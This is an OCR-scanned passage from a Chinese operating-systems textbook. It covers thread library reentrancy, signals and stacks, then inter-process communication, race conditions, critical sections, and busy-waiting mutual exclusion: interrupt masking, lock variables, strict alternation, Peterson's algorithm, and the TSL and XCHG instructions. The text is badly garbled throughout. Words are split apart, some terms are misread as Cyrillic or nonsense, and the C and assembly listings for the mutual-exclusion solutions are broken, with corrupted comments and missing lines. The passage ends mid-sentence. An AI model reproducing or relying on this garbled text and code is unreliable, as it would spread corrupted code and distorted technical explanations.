该 存储 空间 分 配 在 何 处 ， 只 有 调用 线程 才 可 访问 其 全 局 变量 。 如 果 另 -个 线程 创建 了 同名 的 全 局 变量 ， 
由 于 它 在 不 同 的 存储 单元 上 ， 所 以 不 会 与 已 有 的 那个 变量 产生 冲突 。 

访问 全 局 变量 需要 两 个 调用 : 一 个 用 于 写 入 全 局 变量 ， 另 一 个 用 于 读 取 全 局 变量 。 对 于 写 人 ， 类 似 有 

set_global("bufptr", &buf); 
它 把 指针 的 值 保存 在 先前 通过 调用 create_global 创 建 的 存储 单元 中 。 如 果 要 读 出 一 个 全 局 变量 ， 调 用 的 
形式 类 似 于 

bufptr = read_global("bufptr"); 
这 个 调用 返回 一 个 存储 在 全 局 变量 中 的 地 址 ， 这 样 就 可 以 访问 其 中 的 数据 了 。 

试图 将 单一 线程 程序 转 为 多 线程 程序 的 另 一 个 问题 是 ， 有 许多 库 过 程 并 不 是 可 重 人 的。 也 就 是 说 ， 
它们 不 是 被 设计 成 下 列 工作 方式 的 ， 对 于 任何 给 定 的 过 程 ， 当前 面 的 调用 尚 没有 结束 之 前 ， 可 以 进行 第 
二 次 调用 。 例 如 ， 可 以 将 通过 网 络 发 送 消息 恰当 地 设计 为 ， 在 库 内 部 的 一 个 固定 缓冲 区 中 进行 消息 组 合 ， 
然后 陷 人 内 核 将 其 发 送 。 但 是 ， 如 果 一 个 线程 在 缓冲 区 中 编 好 了 消息 ， 然后 被 时 钟 中 断 强迫 切换 到 第 二 
个 线程 ， 而 第 二 个 线程 立即 用 它 自己 的 消息 重 写 了 该 缓冲 区 ， 那 会 怎样 呢 ? 

类 似 地 还 有 内 存 分 配 过 程 ， 例 如 UNIX 中 的 malloc， 它 维护 着 内 存 使 用 情况 的 关键 表格 ， 如 可 用 内 
存 块 链表 。 在 malloc 忙 于 更 新 表格 时 ， 有 可 能 暂时 处 于 一 种 不 一 致 的 状态 ， 指 针 的 指向 不 定 。 如 果 在 表 
格 处 于 一 种 不 一 致 的 状态 时 发 生 了 线程 切换 ， 并 且 从 一 个 不 同 的 线程 中 来 了 一 个 新 的 调用 ， 就 可 能 会 由 
于 使 用 了 一 个 无 效 指针 从 而 导致 程序 崩溃 。 要 有 效 的 解决 所 有 这 些 问题 意味 着 重 写 整个 库 。 做 这 件 事 并 
非 是 无 效 的 行为 。 

另 一 种 解决 方案 是 ， 为 每 个 过 程 提供 一 个 包装 器 ， 该 包装 器 设置 一 个 二 进 制 位 从 而 标志 某 个 库 处 于 
使 用 中 。 在 先前 的 调用 还 没有 完成 之 前 ， 任何 试图 使 用 该 库 的 其 他 线程 都 会 被 阻塞 。 尽管 这 个 方式 可 以 
工作 ,但 是 它 会 极 大 地 降低 系统 潜在 的 并 行 性 。 

接着 考虑 信号 。 有 些 信号 逻辑 上 是 线程 专用 的 ， 但 是 另 一 些 却 不 是 。 例 如 ， 如 果 某 个 线程 调用 
alarm， 信 号 送 往 进行 该 调用 的 线程 是 有 意义 的 。 但 是 ， 当 线 程 完全 在 用 户 空间 实现 时 ， 内 核 根本 不 知 
道 有 线程 存在 ， 因 此 很 难 将 信号 发 送 给 正确 的 线程 。 如 果 一 个 进程 一 次 仅 有 一 个 警报 信号 等 待 处 理 ， 而 
其 中 的 多 个 线程 又 独立 地 调用 alarm， 那么 情况 就 更 加 复杂 了 。 

有 些 信号 ， 如 键盘 中 断 ， 则 不 是 线程 专用 的 。 谁 应 该 捕捉 它们 ? 一 个 指定 的 线程 ”所 有 的 线程 ”还 
是 新 创建 的 弹出 式 线程 ? 进而， 如果 某 个 线程 修改 了 信号 处 理 程序 ， 而 没有 通知 其 他 线程 ， 会 出 现 什么 
情况 ?如 果 某 个 线程 想 捕捉 一 个 特定 的 信号 (比如 ， 用 户 击 键 CTRL+C)， 而 另 一 个 线程 却 想 用 这 个 信 
号 终止 进程 ， 又 会 发 生 什么 情况 ? 如 果 有 一 个 或 多 个 线程 运行 标准 的 库 过 程 以 及 其 他 用 户 编写 的 过 程 ， 
那么 情况 还 会 更 复杂 。 很 显然 ， 这 些 想法 是 不 兼容 的 。 一 般 而 言 ， 在 单线 程 的 环境 中 信号 已 经 是 很 难 管 
理 的 了 ， 到 了 多 线程 环境 中 并 不 会 使 这 一 情况 变 得 容易 处 理 。 

由 多 线程 引入 的 最 后 一 个 问题 是 堆栈 的 管理 。 在 很 多 系统 中 ， 当 一 个 进程 的 堆栈 溢出 时 ， 内 核 只 是 
自动 为 该 进程 提供 更 多 的 堆栈 。 当 一 个 进程 有 多 个 线程 时 ， 就 必须 有 多 个 堆栈 。 如 果 内 核 不 了 解 所 有 的 
堆栈 ， 就 不 能 使 它们 自动 增长 ， 直 到 造成 堆栈 出 错 。 事实 上 ， 内 核 有 可 能 还 没有 意识 到 内 存 错 是 和 某 个 
线程 栈 的 增长 有 关系 的 。 

这 些 问题 当然 不 是 不 可 克服 的 ， 但 是 却说 明了 给 已 有 的 系统 引入 线 程 而 不 进行 实质 性 的 重新 设计 系 
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统 是 根本 不 行 的。 至 少 可 能 需要 重新 定义 系统 调用 的 语义 ， 并 且 不 得 不 重 和 而 且 所 有 这 些 工作 必须 
与 在 一 个 进程 中 有 一 个 线程 的 原 有 程序 向 后 兼容 。 有 关 线 程 的 其 他 信息 ， 可 以 参阅 (Hauser ЖА, 
1993, Магѕһ Л, 1991), 


23 进程 间 通信 

进程 经 常 需要 与 其 他 进程 通信 。 例 如 ， 在 一 个 shell 管道 中 ， 第 一 个 进程 的 输出 必须 传送 给 第 二 个 进 
程 ， 这 样 沿 着 管道 传递 下 去 。 因 此 在 进程 之 间 需 要 通信 ， 而 且 最 好 使 用 一 种 结构 良好 的 方式 ， 不 要 使 用 
中 断 。 在 下 面 几 节 中 ， 我 们 就 来 讨论 一 些 有 关 进 程 间 通信 (Inter Process Communication, IPC) 的 问题 。 

简要 地 说 ， 有 三 个 问题 。 第 一 个 问题 与 上 面 的 叙述 有 关 ， 即 一 个 进程 如 何 把 信息 传递 给 另 一 个 。 第 
二 个 要 处 理 的 问题 是 ， 确 保 两 个 或 更 多 的 进程 在 关键 活动 中 不 会 出 现 交叉 ， 例 如 ， 在 飞机 订 票 系统 中 的 
两 个 进程 为 不 同 的 客户 试图 争夺 飞机 上 的 最 后 一 个 座位 。 第 三 个 问题 与 正确 的 顺序 有 关 (如 果 该 顺序 是 
有 关联 的 话 )， 比 如 ， 如 果 进 程 A 产 生 数据 而 进程 B 打 印 数据 ， 那 么 B 在 打印 之 前 必须 等 待 ， 直 到 A 已 经 
产生 一 些 数据 。 我 们 将 从 下 一 节 开始 考察 所 有 这 三 个 问题 。 

有 必要 说 明 ， 这 三 个 问题 中 的 两 个 问题 对 于 线程 来 说 是 同样 适用 的 。 第 一 个 问题 〈 即 传递 信息 ) 对 线 
程 而 言 比较 容易 ， 因 为 它们 共享 一 个 地 址 空间 (在 不 同 地 址 空间 需要 通信 的 线程 属于 不 同 进程 之 间 的 通信 
情形 )。 但 是 另外 两 个 问题 (需要 梳理 清楚 并 保持 恰当 的 顺序 ) 同样 适用 于 线程 。 同样 的 问题 可 用 同样 的 
方法 解决 。 下 面 开 始 讨论 进程 间 通 信 的 问题 ， 不 过 请 记 住 ， 同 样 的 问题 和 解决 方法 也 适用 于 线程。 
231 竞争 条 件 

在 一 些 操作 系统 中 ， 协 作 的 进程 可 能 共享 一 些 彼此 都 能 读 写 的 公用 存储 区 。 这 个 公用 存储 区 可 能 在 
内 存 中 (可 能 是 在 内 核 数据 结构 中 )， 也 可 能 是 一 个 共享 文件 。 这 里 共享 存储 区 的 位 置 并 不 影响 通信 的 
本 质 及 其 带 来 的 问题 。 为 了 理解 实际 中 进程 间 通 信 如 何 工作 ， 我 们 考虑 一 个 简单 但 很 普遍 的 例子 ， 一 个 
假 脱 机 打印 程序 。 当 一 个 进程 需要 打印 一 个 文件 时 ， 它 将 文件 名 放 在 一 个 特殊 的 假 脱 机 日 录 (spooler 
directory) 下 。 另 一 个 进程 (打印 机 守护 进程 ) 则 周期 性 地 检查 是 否 有 文件 需要 打印 ， 若 有 就 打印 并 将 
该 文件 名 从 目录 下 删 掉 。 


设想 假 脱 机 目录 中 有 许多 槽 位 ， 编 号 依次 为 0，1， ERORE 
2，…， 每 个 模 位 存放 一 个 文件 名 。 同 时 假设 有 两 个 共 i 
享 变量 :out， 指 向 下 一 个 要 打印 的 文件 ，in， 指 向 目录 a| a эы 
中 下 一 个 空 亲本 位 。 可 以 把 这 两 个 变量 保存 在 一 个 所 有 ga s| pos 
进程 都 能 访问 的 文件 中 ， 该 文件 的 长 度 为 两 个 字 。 在 某 e| pan 
一 时 刻 ，0 号 至 3 号 醒 位 空 (其 中 的 文件 已 经 打印 完毕 )， 7 КР 
4 号 至 6 号 模 位 被 占用 (其 中 存 有 排 好 队列 的 要 打印 的 文 。 一 
件 名 )。 儿 乎 在 同一 时 刻 ， 进 程 A 和 进程 B 都 决定 将 一 个 CRB д 


文件 排队 打印 ， 这 种 情况 如 图 2-21 所 示 。 
在 Murphy 法 则 (任何 可 能 出 错 的 地 方 终 将 出 错 ) 图 2-21 两 个 进程 同时 想 访问 共享 内 存 
生效 时 ， 可 能 发 生 以 下 的 情况 。 进 程 A 读 到 in 的 值 为 7， 
将 7 存在 一 个 局 部 变量 next_free_slot 中 。 此 时 发 生 一 次 时 钟 中 断 ，CPU 认 为 进程 A 已 运行 了 足够 长 的 时 间 ， 
决定 切换 到 进程 B。 进 程 B 也 读 取 in， 同 样 得 到 值 为 7， 于 是 将 7 存在 B 的 局 部 变量 next_free_slot 中 。 在 这 
一 时 刻 两 个 进程 都 认为 下 一 个 可 用 槽 位 是 7。 
进程 B 现 在 继续 运行 ， 它 将 其 文件 名 存在 槽 位 7 中 并 将 in 的 值 更 新 为 8。 然 后 它 离开 ， 继续 执行 其 他 操作 。 
最 后 进程 A 接 着 从 上 次 中 断 的 地 方 再 次 运行 。 它 检查 变量 next_free_slot， 发 现 其 值 为 7， 于 是 将 打 
印 文件 名 存 人 7 号 权 位 ， 这 样 就 把 进程 B 存 在 那里 的 文件 名 蓝 盖 掉 。 然 后 它 将 next_free_slot 加 1， 得 到 值 
为 8， 就 将 8 存 到 in 中 。 此 时 ， 假 脱 机 目录 内 部 是 一 致 的 ， 所 以 打印 机 守护 进程 发 现 不 了 任何 错误 ， 但 进 
程 B 却 永远 得 不 到 任何 打印 输出 。 类 似 这 样 的 情况 ， 即 两 个 或 多 个 进程 读 写 某 些 共享 数据 ， 而 最 后 的 结 
果 取 决 于 进程 运行 的 精确 时 序 ， 称 为 竞争 条 件 (race condition), 调试 包含 有 竞争 条 件 的 程序 是 一 件 很 
头痛 的 事 。 大 多 数 的 测试 运行 结果 都 很 好 ， 但 在 极 少数 情况 下 会 发 生 一 些 无 法 解释 的 奇怪 现象 。 
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2.3.2 临界 区 

怎样 避免 竞争 条 件 ? 实 际 上 凡 涉 及 共享 内 存 、 共 享 文件 以 及 共享 任何 资源 的 情况 都 会 引发 与 前 面 类 
似 的 错误 ， 要 避免 这 种 错误 ， 关 键 是 要 找 出 某 种 途径 来 阻止 多 个 进程 同时 读 写 共享 的 数据 。 换 言 之 ， 我 
MIRRE (mutual exclusion) ， 即 以 某 种 手段 确保 当 一 个 进程 在 使 用 一 个 共享 变量 或 文件 时 ， 其 
他 进程 不 能 做 同样 的 操作 。 前 述 问题 的 症结 就 在 于 ， 在 进程 A 对 共享 变量 的 使 用 未 结束 之 前 进程 B 就 使 
用 它 。 为 实现 互 斥 而 选择 适当 的 原 语 是 任何 操作 系统 的 主要 设计 内 容 之 一 ， 也 是 我 们 在 后 面 几 节 中 要 详 
细 讨 论 的 主题 。 

避免 竞争 条 件 的 问题 也 可 以 用 一 种 抽象 的 方式 进行 描述 。 一 个 进程 的 一 部 分 时 间 做 内 部 计算 或 另外 
- 些 不 会 引发 竞争 条 件 的 操作 。 在 某 些 时 候 进程 可 能 需要 访问 共享 内 存 或 共享 文件 ， 或 执行 另外 一 些 会 导 
致 竞争 的 操作 。 我 们 把 对 共享 内 存 进行 访问 的 程序 片段 称 作 临界 区 域 (critical region) 或 临界 区 ( critical 
section)。 如 果 我 们 能 够 适当 地 安排 ， 使 得 两 个 进程 不 可 能 同时 处 于 临界 区 中 ， 就 能 够 避免 竟 争 条 件 。 

尽管 这 样 的 要 求 避 免 了 竞争 条 件 ， 但 它 还 不 能 保证 使 用 共享 数据 的 并 发 进程 能 够 正确 和 高 效 地 进行 
协作 。 对 于 一 个 好 的 解决 方案 ， 需 要 满足 以 下 4 个 条 件 : 

D 任何 两 个 进程 不 能 同时 处 于 其 临界 区 。 

2) 不 应 对 CPU 的 速度 和 数量 做 任何 假设 。 

3) 临界 区 外 运行 的 进程 不 得 阻塞 其 他 进程 。 

4) 不 得 使 进程 无 限期 等 待 进入 临界 区 。 

从 抽象 的 角度 看 ， 我 们 所 希望 的 进程 行为 如 图 2-22 所 示 。 图 2-22 中 进程 A 在 TI 时 刻 进入 临界 区 。 稍 
后 ， 在 T; 时 刻 进程 B 试 图 进入 临界 区 ， 但 是 失败 了 ， 因为 另 一 个 进程 已 经 在 该 临界 区 内 ， 而 一 个 时 刻 只 
友 许 一 个 进程 在 临界 区 内 。 随 后 ，B 被 暂时 挂 起 直到 Ti 时 刻 A 离 开 临界 区 为 止 ， 从 而 允许 B 立 即 进入 。 最 
后 ，B 离 开 (在 时 刻 T,) ， 回 到 了 在 临界 区 中 没有 进程 的 原始 状态 。 
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2-22 使 用 临界 区 的 互 斥 


233 忙 等 待 的 互 斥 

本 节 将 讨论 几 种 实现 互 斥 的 方案 。 在 这 些 方案 中 ， 当 一 个 进程 在 临界 区 中 更 新 共享 内 存 时 ， 其 他 进 
程 将 不 会 进入 其 临界 区 ， 也 不 会 带 来 任何 麻烦 。 

1. 屏蔽 中 断 

在 单 处 理 器 系统 中 ， 最 简单 的 方法 是 使 每 个 进程 在 刚刚 进入 临界 区 后 立即 屏蔽 所 有 中 断 ， 并 在 就 要 
离开 之 前 再 打开 中 断 。 屏 项 中 断后 ， 时 钟 中 断 也 被 屏蔽。 CPU 只 有 发 生 时 钟 中 断 或 其 他 中 断 时 才 会 进行 
进程 切换 ， 这 样 ， 在 屏蔽 中 断 之 后 CPU 将 不 会 被 切换 到 其 他 进程 。 于 是 ， 一 旦 某 个 进程 屏蔽 中 断 之 后 ， 
它 就 可 以 检查 和 修改 共享 内 存 ， 而 不 必 担心 其 他 进程 介入 。 

这 个 方案 并 不 好 ， 因 为 把 屏蔽 中 断 的 权力 交 给 用 户 进 程 是 不 明智 的 。 设想 一 下 ， 若 一 个 进程 屏蔽 中 
断后 不 再 打开 中 断 ， 其 结果 将 会 如 何 ?整个 系统 可 能 会 因此 终止 。 而 且 ， 如 果 系统 是 多 处 理 器 (有 两 个 
或 可 能 更 多 的 处 理 器 )， 则 屏蔽 中 断 仅仅 对 执行 disable 指 令 的 那个 CPU 有 效 。 其 他 CPU 仍 将 继续 运行 ， 
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并 可 以 访问 共享 内 存 。 
另 一 方面 ， 对 内 核 来 说 ， 当 它 在 更 新 变量 或 列表 的 几 条 指令 期 间 将 中 断 屏蔽 是 很 方便 的 。 当 就 绪 进 
程 队列 之 类 的 数据 状态 不 一 致 时 发 生 中 断 ， 则 将 导致 竞争 条 件 。 所 以 结论 是 : 屏蔽 中 断 对 于 操作 系统 本 
身 而 言 是 一 项 很 有 用 的 技术 ， 但 对 于 用 户 进程 则 不 是 一 种 合适 的 通用 互 斥 机 制 。 
由 于 多 核 芯片 的 数量 越 来 越 多 ， 即 使 在 低 端 PC 上 也 是 如 此 。 因 此 ， 通 过 屏蔽 中 断 来 达到 互 斥 的 可 
能 性 一 一 甚至 在 内 核 中 一 一 变 得 日 益 减少 了 。 双 核 现在 已 经 相当 普遍 ， 四 核 当前 在 高 端 机 器 中 存在 ， 而 
且 我 们 离 八 或 十 六 ( 核 ) 也 不 久远 了 。 在 一 个 多 核 系统 中 (例如 ， 多 处 理 器 系统 )， 屏 项 一 个 CPU 的 中 
断 不 会 阻止 其 他 CPU 干预 第 一 个 CPU 所 做 的 操作 。 结 果 是 人 们 需要 更 加 复杂 的 计划 。 
2. 锁 变 量 
作为 第 二 种 尝试 ， 可 以 寻找 一 种 软件 解决 方案 。 设 想 有 一 个 共享 ( 锁 ) 变量 ， 其 初始 值 为 0。 当 一 
个 进程 想 进入 其 临界 区 时 ， 它 首先 测试 这 把 锁 。 如 果 该 锁 的 值 为 0， 则 该 进程 将 其 设置 为 1 并 进入 临界 区 。 
若 这 把 锁 的 值 已 经 为 1， 则 该 进程 将 等 待 直到 其 值 变 为 0。 于 是 ，0 就 表示 临界 区 内 没有 进程 ，1 表 示 已 经 
有 某 个 进程 进入 临界 区 。 
但 是 ， 这 种 想法 也 包含 了 与 假 脱 机 目录 一 样 的 疏漏 。 假 设 一 个 进程 读 出 锁 变 量 的 值 并 发 现 它 为 0， 
而 恰好 在 它 将 其 值 设置 为 1 之 前 ， 另 一 个 进程 被 调度 运行 将 该 锁 变 量 设置 为 1。 当 第 一 个 进程 再 次 能 运 
行 时 ， 它 同样 也 将 该 锁 设 置 为 1， 则 此 时 同时 有 两 个 进程 进入 临界 区 中 。 
可 能 读者 会 想 ， 先 读 出 锁 变 量 ， 紧 接着 在 改变 其 值 之 前 再 检查 一 遍 它 的 值 ， 这 样 便 可 以 解决 问题 。 
但 这 实际 上 无 济 于 事 ， 如 果 第 二 个 进程 恰好 在 第 一 个 进程 完成 第 二 次 检查 之 后 修改 了 锁 变 量 的 值 ， 则 同 
样 还 会 发 生 竞争 条 件 。 
3. 严 格 轮换 法 
第 三 种 互 斥 的 方法 如 图 2-23 所 示 。 几 乎 与 本 书 中 所 有 其 他 程序 一 样 ， 这 里 的 程序 段 用 C 语 言 编写 。 
之 所 以 选择 C 语 言 是 由 于 实际 的 操作 系统 普遍 用 C 语 言 编写 (或 偶尔 用 C++)， 而 基本 上 不 用 像 Java、 
Modula3 或 Pascal 这 样 的 语言 。 对 于 编写 操作 系统 而 言 ，C 语 言 是 强大 、 有 效 、 可 预知 和 有 特性 的 语言 。 
而 对 于 Java， 它 就 不 是 可 预知 的 ， 因 为 它 在 关键 时 刻 会 用 完 存储 器 ， 而 在 不 合适 的 时 候 会 调用 垃圾 收集 
程序 回收 内 存 。 在 C 语 言 中 ， 这 种 情形 就 不 可 能 发 生 ， 因 为 C 语 言 中 不 需要 进行 空间 回收 。 有 关 C、C++、 
Java 和 其 他 四 种 语言 的 定量 比较 可 参阅 (Prechelt, 2000), 
在 图 2-23 中 ， 整 型 变量 turn， 初 始 值 为 0%， 用 于 记录 轮 到 哪个 进程 进入 临界 区 ， 并 检查 或 更 新 共享 内 
存 。 开 始 时 ， 进 程 0 检查 turn， 发 现 其 值 为 0(， 于 是 进入 临界 区 。 进 程 1 也 发 现 其 值 为 0， 所 以 在 一 个 等 竺 
循环 中 不 停 地 测试 ur， 看 其 值 何 时 变 为 1。 连 续 测试 一 个 变量 直到 某 个 值 出 现 为 止 ， 称 为 忙 等 待 (busy 
waiting)。 由 于 这 种 方式 浪费 CPU 时 间 ， 所 以 通常 应 该 避免 。 
while (TRUE) { while (TRUE) { 
ае while (шт != 1) I 循环 "I 
critical region( ); 
tum = 0; 
noncritical_region( ); 


} } 
a) b) 


图 2-23 临界 区 问题 的 一 种 解法 (在 两 种 情况 下 请 注意 分 号 终止 了 while 语 句 ) ，a) 进程 0，b) 进程 1 


只 有 在 有 理由 认为 等 待 时 间 是 非常 短 的 情形 下 ， 才 使 用 忙 等 待 。 用 于 忙 等 待 的 锁 ， 称 为 自 旋 锁 
(spin lock), 

进程 0 离开 临界 区 时 ， 它 将 turn 的 值 设置 为 1， 以 便 允 许 进程 ] 进 入 其 临界 区 。 假 设 进程 1 很 快 便 离开 
了 临界 区 ， 则 此 时 两 个 进程 都 处 于 临界 区 之 外 ，turn 的 值 又 被 设置 为 0。 现在 进程 0 很 快 就 执行 完 其 整个 
循环 ， 它 退出 临界 区 ， 并 将 turn 的 值 设 置 为 1!。 此 时 ，turn 的 值 为 1 ， 两 个 进程 都 在 其 临界 区 外 执行 。 

突然 ， 进 程 0 结束 了 非 临 界 区 的 操作 并 且 返 回 到 循环 的 开始 。 但 是 ， 这 时 它 不 能 进入 临界 区 ， 因为 
turn 的 当前 值 为 1， 而 此 时 进程 1 还 在 忙于 非 临 界 区 的 操作 ， 进 程 0 只 有 继续 while 循 环 ， 直到 进程 1 把 turn 
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的 值 改 为 0。 这 说 明 ， 在 一 个 进程 比 另 一 个 慢 了 很 多 的 情况 下 ， 轮 流 进入 临界 区 并 不 是 一 个 好 办 法 。 

这 种 情况 违反 了 前 面 叙 述 的 条 件 3， 进 程 0 被 一 个 临界 区 之 外 的 进程 阻塞 。 再 回 到 前 面 假 脱 机 目录 的 
问题 ， 如 果 我 们 现在 将 临界 区 与 读 写 假 脱 机 目录 相 联 系 ， 则 进程 0 有 可 能 因为 进程 1 在 做 其 他 事情 而 被 禁 
止 打印 另 一 个 文件 。 

实际 上 ， 该 方案 要 求 两 个 进程 严格 地 轮流 进入 它们 的 临界 区 ， 如 假 脱 机 文件 等 。 任 何 一 个 进程 都 不 
可 能 在 一 轮 中 打印 两 个 文件 。 尽 管 该 算法 的 确 避 免 了 所 有 的 竞争 条 件 ， 但 由 于 它 违反 了 条 件 3， 所 以 不 
能 作为 一 个 很 好 的 备 选 方案 。 

4. Peterson 解 法 - 

荷兰 数学 家 T. Dekker 通 过 将 锁 变量 与 警告 变量 的 思想 相 结合 ， 最 早 提 出 了 一 个 不 需要 严格 轮换 的 软 
件 互 斥 算法 。 关 于 Dekker 的 算法 ， 请 参阅 (Dijkstra, 1965), 

1981 年 ，G. L. Peterson 发 现 了 一 种 简单 得 多 的 互 斥 算法 ， 这 使 得 Dekker 的 方法 不 再 有 任何 新 意 。 
Peterson 的 算法 如 图 2-24 所 示 。 该 算法 由 两 个 用 ANSI C 编 写 的 过 程 组 成 。ANSI C 要 求 为 所 定义 和 使 用 的 
所 有 函数 提供 函数 原型 。 不 过 ， 为 了 节省 篇 幅 ， 在 这 里 和 后 续 的 例子 中 我 们 将 不 给 出 函数 原型 。 


#define FALSE 0 
#define TRUE 1 


#define N 2 * 进程 数量 Y 
int turn; ЗЕЕ? */ 
int interested[N]; 人 * 所 有 值 初始 化 为 0 (FALSE) */ 
void enter_region(int process); ожа */ 
l int other; 作 其 他 进程 号 */ 
other = 1 – process; /* 另 一 方 进程 */ 
interested[process] = TRUE; 1 表明 所 感 兴趣 的 */ 
turn = process; 局 设置 标志 */ 


while (шт == process && interested[other] == TRUE);/* 空 语句 */ 
} 


void leave _region(int process) * 进程 谁 离开 ? */ 
interested[process] = FALSE; I 表示 离开 临界 区 */ 


图 2-24 完成 互 斥 的 Peterson 解 法 


在 使 用 共享 变量 ( 即 进入 其 临界 区 ) >й. 各 个 进程 使 用 其 进程 号 0 或 1 作为 参数 来 调用 enter_ 
region。 该 调用 在 需要 时 将 使 进程 等 待 ， 直 到 能 安全 地 进入 临界 区 。 在 完成 对 共享 变量 的 操作 之 后 ， 进 
程 将 调用 leave_region， 表 示 操 作 已 完成 ， 若 其 他 的 进程 希望 进入 临界 区 ， 则 现在 就 可 以 进入 。 

现在 来 看 看 这 个 方案 是 如 何 工作 的 。 一 开始 ， 没有 任何 进程 处 于 临界 区 中 ， 现 在 进程 0 调用 enter_ 
region。 它 通过 设置 其 数组 元 素 和 将 turn 置 为 0 来 标识 它 希 望 进入 临界 区 。 由 于 进程 1 并 不 想 进 入 临界 区 ， 
所 以 enter_region 很 快 便 返回 。 如 果 进 程 1 现在 调用 enter_region， 进 程 ! 将 在 此 处 挂 起 直到 interested[0] 变 
成 FALSE， 该 事件 只 有 在 进程 0 调用 leave_region 退 出 临界 区 时 才 会 发 生 。 

现在 考虑 两 个 进程 几乎 同时 调用 enter_region 的 情况 。 它 们 都 将 自 己 的 进程 号 存 入 turn， 但 只 有 后 被 
保存 进去 的 进程 号 才 有 效 ， 前 一 个 因 被 重 写 而 丢失 。 假设 进程 1 是 后 存 入 的 ， 则 turn 为 1。 当 两 个 进程 都 
运行 到 while 语 句 时 ， 进 程 0 将 循环 0 次 并 进入 临界 区 ， 而 进程 1 则 将 不 停 地 循环 且 不 能 进入 临界 区 ， 直 到 
进程 0 退出 临界 区 为 止 。 

5.TSL 指 令 

现在 来 看 需要 硬件 支持 的 一 种 方案 。 某 些 计算 机 中 ， 特别 是 那些 设计 为 多 处 理 器 的 计算 机 ， 都 有 下 
面 一 条 指令 : 

TSL RX, LOCK 
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称 为 测试 并 加 锁 (Test and Set Lock)， 它 将 一 个 内 存 字 lock 读 到 寄存 器 RX 中 ， 然 后 在 该 内 存 地 址 上 存 一 
个 非 零 值 。 读 字 和 写字 操作 保证 是 不 可 分 割 的 ， 即 该 指令 结束 之 前 其 他 处 理 器 均 不 允许 访问 该 内 存 字 。 
执行 TSL 指 令 的 CPU 将 锁 住 内 存 总 线 ， 以 禁止 其 他 CPU 在 本 指令 结束 之 前 访问 内 存 。 

着 重 说 明 一 下 ， 锁 住 存储 总 线 不 同 于 屏蔽 中 断 。 屏 蔽 中 断 ， 然 后 在 读 内 存 字 之 后 跟着 写 操作 并 不 能 
阻止 总 线 上 的 第 二 个 处 理 器 在 读 操作 和 写 操作 之 间 访 问 该 内 存 字 。 事 实 上 ， 在 处 理 器 1 上 屏蔽 中 断 对 处 
理 器 2 根本 没有 任何 影响 。 让 处 理 器 2 远离 内 存 直到 处 理 器 1 完成 的 惟一 方法 就 是 锁 住 总 线 ， 这 需要 一 个 
特殊 的 硬件 设施 (基本 上 ， 一 根 总 线 就 可 以 确保 总 线 由 锁 住 它 的 处 理 器 使 用 ， 而 其 他 的 处 理 器 不 能 用 )。 

为 了 使 用 TSL 指 令 ， 要 使 用 一 个 共享 变量 lock 来 协调 对 共享 内 存 的 访问 。 当 lock 为 0 时 ， 任 何 进程 
都 可 以 使 用 TSL 指 令 将 其 设置 为 !， 并 读 写 共享 内 存 。 当 操作 结束 时 ， 进 程 用 一 条 普通 的 move 指 令 将 
lock 的 值 重新 设置 为 0。 

这 条 指令 如 何 防止 两 个 进程 同时 进入 临界 区 呢 ? 解决 方案 如 图 2-25 所 示 。 假 定 (但 很 典型 ) 存在 如 
下 共 4 条 指令 的 汇编 语言 子 程序 。 第 一 条 指令 将 lock 原来 的 值 复制 到 寄存 器 中 并 将 lock 设置 为 1， 随 后 这 
个 原来 的 值 与 0 相 比较 。 如 果 它 非 零 ， 则 说 明 以 前 已 被 加 锁 ， 则 程序 将 回 到 开始 并 再 次 测试 。 经 过 或 长 
或 短 的 一 段 时 间 后 ， 该 值 将 变 为 0 (当前 处 于 临界 区 中 的 进程 退出 临界 区 时 ) ， 于 是 过 程 返回 ， 此 时 已 加 
锁 。 要 清除 这 个 锁 非常 简单 ， 程 序 只 需 将 0 存 和 lock 即 可 ， 不 需要 特殊 的 同步 指令 。 


enter_region: 

TSL REGISTER,LOCK 1 ї 1 

СМР REGISTER,#0 1 Бина 

JNE enter гесіоп ПЕТЕ, засни, яо 

ВЕТ 1 返回 调用 者 ， 进 入 了 临界 区 
leave_region: 

MOVE LOCK, #0 1 在 锁 中 存 和 0 

RET 1 返回 调用 者 


图 2-25 用 TSL 指 令 进入 和 离开 临界 区 


现在 有 一 种 很 明确 的 解法 了 。 进 程 在 进入 临界 区 之 前 先 调用 enter_region， 这 将 导致 忙 等 待 ， 直到 
锁 空闲 为 止 ， 随 后 它 获得 该 锁 并 返回 。 在 进程 从 临界 区 返回 时 它 调用 leave_region， 这 将 把 lock 设 置 为 0。 
与 基于 临界 区 问题 的 所 有 解法 一 样 ， 进 程 必须 在 正确 的 时 间 调 用 enter_region 和 leave_region， 解 法 才能 
奏效 。 如 果 一 个 进程 有 欺诈 行为 ， 则 互 斥 将 会 失败 。 

一 个 可 替代 TSL 的 指令 是 XCHG， 它 原子 性 地 交换 了 两 个 位 置 的 内 容 ， 例 如 ， 一 个 寄存 器 与 一 个 存 
储 器 字 。 代 码 如 图 2-26 所 示 ， 而 且 就 像 可 以 看 到 的 那样 ， 它 本 质 上 与 TSL 的 解决 办 法 一 样 。 所 有 的 Intel 
x86 CPU 在 低层 同步 中 使 用 XCHG 指 令 。 


enter_region: 
MOVE REGISTER,#1 1 在 寄存 器 中 放 一 个 1 
XCHG REGISTER,LOCK | 交换 寄存 器 与 镇 变量 的 内 容 
CMP REGISTER,#0 | 镇 是 零 吗 ? 
JNE enter_region | 车 不 是 零 ， 说 明 镇 已 被 设置 ， 因 此 循环 
RET 1 返回 调用 者 ， 进 入 临界 区 
leave_region: 
МОМЕ LOCK,#0 1 在 镇 中 存 人 0 
RET 1 返回 调用 者 
图 2-26 用 XCHG 指 令 进入 和 离开 临界 区 
234 ”睡眠 与 唤醒 


Peterson 解 法 和 TSL 或 XCHG 解 法 都 是 正确 的 , 但 它们 都 有 忙 等 待 的 缺点 。 这 些 解法 在 本 质 上 是 这 样 的 : 
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当 一 个 进程 想 进入 临界 区 时 ， 先 检查 是 否 允 许 进入 ， 若 不 允许 ， 则 该 进程 将 原 地 等 待 ， 直 到 允许 为 止 。 

这 种 方法 不 仅 浪费 了 CPU 时 间 ， 而 且 还 可 能 引起 预想 不 到 的 结果 。 考 虑 一 台 计算 机 有 两 个 进程 ，H 
优先 级 较 高 ，L 优 先 级 较 低 。 调 度 规 则 规定 ， 只 要 H 处 于 就 绪 态 它 就 可 以 运行 。 在 某 一 时 刻 ，L 处 于 临界 
区 中 ， 此 时 H 变 到 就 绪 态 ， 准 备 运行 例如， 一 条 1/O 操 作 结 束 )。 现 在 H 开 始 忙 等 待 ， 但 由 于 当 H 就 绪 时 
